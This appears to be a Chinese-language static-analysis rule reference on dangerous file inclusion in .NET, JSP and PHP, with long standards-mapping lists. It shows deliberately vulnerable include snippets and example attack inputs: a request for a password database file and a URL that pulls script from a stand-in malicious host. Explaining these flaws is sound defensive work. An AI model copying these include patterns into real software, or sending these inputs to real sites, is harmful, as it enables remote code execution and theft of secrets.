界: Input Validation and Representation

输入验证与表示问题是由元字符、交替编码和数字表示引起的。安全问题源于信任输入。这些问题包括:“Buffer Overflows”、“Cross-Site Scripting”攻击、“SQL Injection”等其他问题。

Dangerous File Inclusion

Abstract
如果允许未经验证的用户输入控制动态包含在 HTML 文件中的文件,会导致恶意代码的执行。
Explanation
许多现代网络编写语言都能够在一个封装的文件内包含附加的源文件,从而使代码可以重用和模块化。这种能力经常用于赋予应用程序标准外观(应用模板),因而,人们可以共享各种功能而不需要借助编译的代码,或将代码分解成较小的更好管理的文件。各个包含文件都会作为主文件的一部分进行解析,并采用相同的方式来执行。当未验证的用户输入控制了所包含文件的路径时,就会发生 File inclusion 漏洞。

示例 1:以下代码会采用用户指定的模板名称,并将该名称包含在所呈现的 HTML 页面中。


...
ClientScript.RegisterClientScriptInclude("RequestParameterScript", HttpContext.Current.Request.Params["includedURL"]);
...


Example 1 中,攻击者可通过为 includedURL 提供恶意值来完全控制动态 include 语句,从而会使程序包含来自外部站点的文件。

如果攻击者为动态 include 指令指定一个有效文件,.NET 会将该文件的内容插入发送给用户的 HTML 文件。对于一个纯文本文件来说,如 web.config,该文件可能会作为 HTML 输出的一部分来呈现。更为糟糕的是,如果攻击者可以指定一条路径来指向被自己控制的远程站点,那么动态 include 指令就会执行由攻击者提供的任意恶意代码。
References
[1] Standards Mapping - Common Weakness Enumeration CWE ID 94, CWE ID 98, CWE ID 494
[2] Standards Mapping - Common Weakness Enumeration Top 25 2019 [18] CWE ID 094
[3] Standards Mapping - Common Weakness Enumeration Top 25 2020 [17] CWE ID 094
[4] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[5] Standards Mapping - FIPS200 SI
[6] Standards Mapping - General Data Protection Regulation (GDPR) Indirect Access to Sensitive Data
[7] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[8] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[9] Standards Mapping - OWASP Top 10 2004 A1 Unvalidated Input
[10] Standards Mapping - OWASP Top 10 2007 A3 Malicious File Execution
[11] Standards Mapping - OWASP Top 10 2010 A1 Injection
[12] Standards Mapping - OWASP Top 10 2013 A1 Injection
[13] Standards Mapping - OWASP Top 10 2017 A1 Injection
[14] Standards Mapping - OWASP Mobile 2014 M7 Client Side Injection
[15] Standards Mapping - OWASP Application Security Verification Standard 4.0 1.14.2 Configuration Architectural Requirements (L2 L3), 5.2.5 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.2.8 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.3.6 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 5.3.9 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 10.3.2 Deployed Application Integrity Controls (L1 L2 L3), 12.3.2 File Execution Requirements (L1 L2 L3), 12.3.3 File Execution Requirements (L1 L2 L3), 12.3.6 File Execution Requirements (L2 L3), 14.2.3 Dependency (L1 L2 L3), 14.2.4 Dependency (L2 L3)
[16] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 Requirement 6.5.1
[17] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 Requirement 6.3.1.1, Requirement 6.5.3
[18] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 Requirement 6.5.8
[19] Standards Mapping - Payment Card Industry Data Security Standard Version 3.0 Requirement 6.5.8
[20] Standards Mapping - Payment Card Industry Data Security Standard Version 3.1 Requirement 6.5.8
[21] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2 Requirement 6.5.8
[22] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2.1 Requirement 6.5.8
[23] Standards Mapping - Payment Card Industry Software Security Framework 1.0 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control
[24] Standards Mapping - Payment Card Industry Software Security Framework 1.1 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control, Control Objective B.3.1 - Terminal Software Attack Mitigation, Control Objective B.3.1.1 - Terminal Software Attack Mitigation
[25] Standards Mapping - SANS Top 25 2009 Risky Resource Management - CWE ID 094
[26] Standards Mapping - SANS Top 25 2010 Risky Resource Management - CWE ID 098
[27] Standards Mapping - SANS Top 25 2011 Risky Resource Management - CWE ID 829
[28] Standards Mapping - Security Technical Implementation Guide Version 3.1 APP3510 CAT I, APP3600 CAT II
[29] Standards Mapping - Security Technical Implementation Guide Version 3.4 APP3510 CAT I, APP3600 CAT II
[30] Standards Mapping - Security Technical Implementation Guide Version 3.5 APP3510 CAT I, APP3600 CAT II
[31] Standards Mapping - Security Technical Implementation Guide Version 3.6 APP3510 CAT I, APP3600 CAT II
[32] Standards Mapping - Security Technical Implementation Guide Version 3.7 APP3510 CAT I, APP3600 CAT II
[33] Standards Mapping - Security Technical Implementation Guide Version 3.9 APP3510 CAT I, APP3600 CAT II
[34] Standards Mapping - Security Technical Implementation Guide Version 3.10 APP3510 CAT I, APP3600 CAT II
[35] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[36] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[37] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[38] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[39] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[40] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[41] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[42] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[43] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[44] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[45] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[46] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[47] Standards Mapping - Web Application Security Consortium Version 2.00 Remote File Inclusion (RFI) (WASC-05)
desc.dataflow.dotnet.dangerous_file_inclusion
Abstract
如果允许未经验证的用户输入控制动态包含在 JSP 中的文件,会导致恶意代码的执行。
Explanation
许多现代网络编写语言都能够在一个封装的文件内包含附加的源文件,从而使代码可以重用和模块化。这种能力经常用于赋予应用程序标准外观(应用模板),因而,人们可以共享各种功能而不需要借助编译的代码,或将代码分解成较小的更好管理的文件。各个包含文件都会作为主文件的一部分进行解析,并采用相同的方式来执行。当未验证的用户输入控制了所包含文件的路径时,就会发生 File inclusion 漏洞。

例 1:以下代码是 Local File Inclusion 漏洞的示例。示例代码采用了用户指定的模板名称,并将该名称包含在要呈现的 JSP 页面中。

...
<jsp:include page="<%= (String)request.getParameter(\"template\")%>">
...

如果攻击者为动态包含指令指定一个有效文件,则该文件的内容会传送给将在页面上呈现的 JSP 解释器。

如果攻击者采用这种手段发起攻击,

specialpage.jsp?template=/WEB-INF/database/passwordDB

JSP 解释器就会将 /WEB-INF/database/passwordDB 文件的内容在 JSP 页面上呈现,从而对系统安全造成威胁。

更为糟糕的是,如果攻击者可以指定一条路径来指向被自己控制的远程站点,那么动态 include 指令就会执行由攻击者提供的任意恶意代码。

示例 2:此示例代码会使用 c:import 标签将用户指定的远程文件导入当前的 JSP 页面。

...
<c:import url="<%= request.getParameter("privacy")%>">
...

这种攻击手段

policy.jsp?privacy=http://www.malicioushost.com/attackdata.js

可从被攻击者控制的远程站点将恶意代码注入当前 JSP 页面。
References
[1] Standards Mapping - Common Weakness Enumeration CWE ID 94, CWE ID 98, CWE ID 494
[2] Standards Mapping - Common Weakness Enumeration Top 25 2019 [18] CWE ID 094
[3] Standards Mapping - Common Weakness Enumeration Top 25 2020 [17] CWE ID 094
[4] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[5] Standards Mapping - FIPS200 SI
[6] Standards Mapping - General Data Protection Regulation (GDPR) Indirect Access to Sensitive Data
[7] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[8] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[9] Standards Mapping - OWASP Top 10 2004 A1 Unvalidated Input
[10] Standards Mapping - OWASP Top 10 2007 A3 Malicious File Execution
[11] Standards Mapping - OWASP Top 10 2010 A1 Injection
[12] Standards Mapping - OWASP Top 10 2013 A1 Injection
[13] Standards Mapping - OWASP Top 10 2017 A1 Injection
[14] Standards Mapping - OWASP Mobile 2014 M7 Client Side Injection
[15] Standards Mapping - OWASP Application Security Verification Standard 4.0 1.14.2 Configuration Architectural Requirements (L2 L3), 5.2.5 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.2.8 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.3.6 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 5.3.9 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 10.3.2 Deployed Application Integrity Controls (L1 L2 L3), 12.3.2 File Execution Requirements (L1 L2 L3), 12.3.3 File Execution Requirements (L1 L2 L3), 12.3.6 File Execution Requirements (L2 L3), 14.2.3 Dependency (L1 L2 L3), 14.2.4 Dependency (L2 L3)
[16] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 Requirement 6.5.1
[17] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 Requirement 6.3.1.1, Requirement 6.5.3
[18] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 Requirement 6.5.8
[19] Standards Mapping - Payment Card Industry Data Security Standard Version 3.0 Requirement 6.5.8
[20] Standards Mapping - Payment Card Industry Data Security Standard Version 3.1 Requirement 6.5.8
[21] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2 Requirement 6.5.8
[22] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2.1 Requirement 6.5.8
[23] Standards Mapping - Payment Card Industry Software Security Framework 1.0 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control
[24] Standards Mapping - Payment Card Industry Software Security Framework 1.1 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control, Control Objective B.3.1 - Terminal Software Attack Mitigation, Control Objective B.3.1.1 - Terminal Software Attack Mitigation
[25] Standards Mapping - SANS Top 25 2009 Risky Resource Management - CWE ID 094
[26] Standards Mapping - SANS Top 25 2010 Risky Resource Management - CWE ID 098
[27] Standards Mapping - SANS Top 25 2011 Risky Resource Management - CWE ID 829
[28] Standards Mapping - Security Technical Implementation Guide Version 3.1 APP3510 CAT I, APP3600 CAT II
[29] Standards Mapping - Security Technical Implementation Guide Version 3.4 APP3510 CAT I, APP3600 CAT II
[30] Standards Mapping - Security Technical Implementation Guide Version 3.5 APP3510 CAT I, APP3600 CAT II
[31] Standards Mapping - Security Technical Implementation Guide Version 3.6 APP3510 CAT I, APP3600 CAT II
[32] Standards Mapping - Security Technical Implementation Guide Version 3.7 APP3510 CAT I, APP3600 CAT II
[33] Standards Mapping - Security Technical Implementation Guide Version 3.9 APP3510 CAT I, APP3600 CAT II
[34] Standards Mapping - Security Technical Implementation Guide Version 3.10 APP3510 CAT I, APP3600 CAT II
[35] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[36] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[37] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[38] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[39] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[40] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[41] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[42] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[43] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[44] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[45] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[46] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[47] Standards Mapping - Web Application Security Consortium Version 2.00 Remote File Inclusion (RFI) (WASC-05)
desc.dataflow.java.dangerous_file_inclusion
Abstract
如果允许未验证的用户输入控制动态包含在 PHP 中的文件,会导致恶意代码的执行。
Explanation
许多现代网络编写语言都能够在一个封装的文件内包含附加的源文件,从而使代码可以重用和模块化。这种能力经常用于赋予应用程序标准外观(应用模板),因而,人们可以共享各种功能而不需要借助编译的代码,或将代码分解成较小的更好管理的文件。各个包含文件都会作为主文件的一部分进行解析,并采用相同的方式来执行。当未验证的用户输入控制了所包含文件的路径时,就会发生 File inclusion 漏洞。

File inclusion 漏洞是各种 PHP 应用程序中最多见且最为严重的漏洞。在低于 PHP 4.2.0 的版本中,PHP 的安装包附带了默认启用的 register_globals,从而使攻击者很容易重写内部服务器的各种变量。尽管禁用 register_globals 可以从一定程度上减少程序发生 file inclusion 漏洞的风险,但是这些问题仍然存在于各种现代的 PHP 应用程序中。

例 1:以下代码包含了一个文件,该文件位于模板中定义 $server_root 的应用程序下。


...
<?php include($server_root . '/myapp_header.php'); ?$gt;
...


如果将 register_globals 设置为 on,攻击者可以通过提供 $server_root 请求参数覆盖 $server_root 值,从而部分控制动态 include 指令。

例 2:以下代码采用了用户指定的模板名称,并将该名称包含在要呈现的 PHP 页面中。


...
<?php include($_GET['headername']); ?$gt;
...


Example 2 中,攻击者可通过为 headername 提供恶意值来完全控制动态 include 语句,从而会使程序包含来自外部站点的文件。

如果攻击者给动态 include 指令指定有效文件,该文件的内容将被传送到 PHP 解释器。对于一个纯文本文件来说,如 /etc/shadow,该文件可能会作为 HTML 输出的一部分来呈现。更为糟糕的是,如果攻击者可以指定一条路径来指向被自己控制的远程站点,那么动态 include 指令就会执行由攻击者提供的任意恶意代码。
References
[1] Using Register Globals PHP Guide
[2] Standards Mapping - Common Weakness Enumeration CWE ID 94, CWE ID 98, CWE ID 494
[3] Standards Mapping - Common Weakness Enumeration Top 25 2019 [18] CWE ID 094
[4] Standards Mapping - Common Weakness Enumeration Top 25 2020 [17] CWE ID 094
[5] Standards Mapping - DISA Control Correlation Identifier Version 2 CCI-001167
[6] Standards Mapping - FIPS200 SI
[7] Standards Mapping - General Data Protection Regulation (GDPR) Indirect Access to Sensitive Data
[8] Standards Mapping - NIST Special Publication 800-53 Revision 4 SC-18 Mobile Code (P2)
[9] Standards Mapping - NIST Special Publication 800-53 Revision 5 SC-18 Mobile Code
[10] Standards Mapping - OWASP Top 10 2004 A1 Unvalidated Input
[11] Standards Mapping - OWASP Top 10 2007 A3 Malicious File Execution
[12] Standards Mapping - OWASP Top 10 2010 A1 Injection
[13] Standards Mapping - OWASP Top 10 2013 A1 Injection
[14] Standards Mapping - OWASP Top 10 2017 A1 Injection
[15] Standards Mapping - OWASP Mobile 2014 M7 Client Side Injection
[16] Standards Mapping - OWASP Application Security Verification Standard 4.0 1.14.2 Configuration Architectural Requirements (L2 L3), 5.2.5 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.2.8 Sanitization and Sandboxing Requirements (L1 L2 L3), 5.3.6 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 5.3.9 Output Encoding and Injection Prevention Requirements (L1 L2 L3), 10.3.2 Deployed Application Integrity Controls (L1 L2 L3), 12.3.2 File Execution Requirements (L1 L2 L3), 12.3.3 File Execution Requirements (L1 L2 L3), 12.3.6 File Execution Requirements (L2 L3), 14.2.3 Dependency (L1 L2 L3), 14.2.4 Dependency (L2 L3)
[17] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 Requirement 6.5.1
[18] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 Requirement 6.3.1.1, Requirement 6.5.3
[19] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 Requirement 6.5.8
[20] Standards Mapping - Payment Card Industry Data Security Standard Version 3.0 Requirement 6.5.8
[21] Standards Mapping - Payment Card Industry Data Security Standard Version 3.1 Requirement 6.5.8
[22] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2 Requirement 6.5.8
[23] Standards Mapping - Payment Card Industry Data Security Standard Version 3.2.1 Requirement 6.5.8
[24] Standards Mapping - Payment Card Industry Software Security Framework 1.0 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control
[25] Standards Mapping - Payment Card Industry Software Security Framework 1.1 Control Objective 4.2 - Critical Asset Protection, Control Objective 5.4 - Authentication and Access Control, Control Objective B.3.1 - Terminal Software Attack Mitigation, Control Objective B.3.1.1 - Terminal Software Attack Mitigation
[26] Standards Mapping - SANS Top 25 2009 Risky Resource Management - CWE ID 094
[27] Standards Mapping - SANS Top 25 2010 Risky Resource Management - CWE ID 098
[28] Standards Mapping - SANS Top 25 2011 Risky Resource Management - CWE ID 829
[29] Standards Mapping - Security Technical Implementation Guide Version 3.1 APP3510 CAT I, APP3600 CAT II
[30] Standards Mapping - Security Technical Implementation Guide Version 3.4 APP3510 CAT I, APP3600 CAT II
[31] Standards Mapping - Security Technical Implementation Guide Version 3.5 APP3510 CAT I, APP3600 CAT II
[32] Standards Mapping - Security Technical Implementation Guide Version 3.6 APP3510 CAT I, APP3600 CAT II
[33] Standards Mapping - Security Technical Implementation Guide Version 3.7 APP3510 CAT I, APP3600 CAT II
[34] Standards Mapping - Security Technical Implementation Guide Version 3.9 APP3510 CAT I, APP3600 CAT II
[35] Standards Mapping - Security Technical Implementation Guide Version 3.10 APP3510 CAT I, APP3600 CAT II
[36] Standards Mapping - Security Technical Implementation Guide Version 4.1 APSC-DV-003300 CAT II
[37] Standards Mapping - Security Technical Implementation Guide Version 4.2 APSC-DV-003300 CAT II
[38] Standards Mapping - Security Technical Implementation Guide Version 4.3 APSC-DV-003300 CAT II
[39] Standards Mapping - Security Technical Implementation Guide Version 4.4 APSC-DV-003300 CAT II
[40] Standards Mapping - Security Technical Implementation Guide Version 4.5 APSC-DV-003300 CAT II
[41] Standards Mapping - Security Technical Implementation Guide Version 4.6 APSC-DV-003300 CAT II
[42] Standards Mapping - Security Technical Implementation Guide Version 4.7 APSC-DV-003300 CAT II
[43] Standards Mapping - Security Technical Implementation Guide Version 4.8 APSC-DV-003300 CAT II
[44] Standards Mapping - Security Technical Implementation Guide Version 4.9 APSC-DV-003300 CAT II
[45] Standards Mapping - Security Technical Implementation Guide Version 4.10 APSC-DV-003300 CAT II
[46] Standards Mapping - Security Technical Implementation Guide Version 4.11 APSC-DV-003300 CAT II
[47] Standards Mapping - Security Technical Implementation Guide Version 5.1 APSC-DV-003300 CAT II
[48] Standards Mapping - Web Application Security Consortium Version 2.00 Remote File Inclusion (RFI) (WASC-05)
desc.dataflow.php.dangerous_file_inclusion